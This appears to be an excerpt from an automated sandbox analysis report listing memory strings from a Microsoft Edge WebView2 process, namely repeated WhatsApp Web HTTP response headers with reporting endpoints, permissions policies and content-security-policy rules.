                  Source: msedgewebview2.exe, 00000020.00000003.2569583294.00001B4400F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:image/pngvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:39:42 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: b
                  Source: msedgewebview2.exe, 00000020.00000003.2569583294.00001B4400F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:image/pngvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:39:42 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: b
                  Source: msedgewebview2.exe, 00000020.00000003.2569583294.00001B4400F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:image/pngvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:39:42 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: b
                  Source: msedgewebview2.exe, 00000020.00000003.2380362699.00001B4400120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 22:48:22 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src '
                  Source: msedgewebview2.exe, 00000020.00000003.2380362699.00001B4400120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 22:48:22 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src '
                  Source: msedgewebview2.exe, 00000020.00000003.2379275155.00001B4400434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 22:48:22 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src '
                  Source: msedgewebview2.exe, 00000020.00000003.2379275155.00001B4400434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 22:48:22 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src '
                  Source: msedgewebview2.exe, 00000020.00000003.2551311546.00001B44006C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 13:14:51 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src '
                  Source: msedgewebview2.exe, 00000020.00000003.2551311546.00001B44006C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 13:14:51 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src '
                  Source: msedgewebview2.exe, 00000020.00000003.2551019821.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 13:14:51 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src '
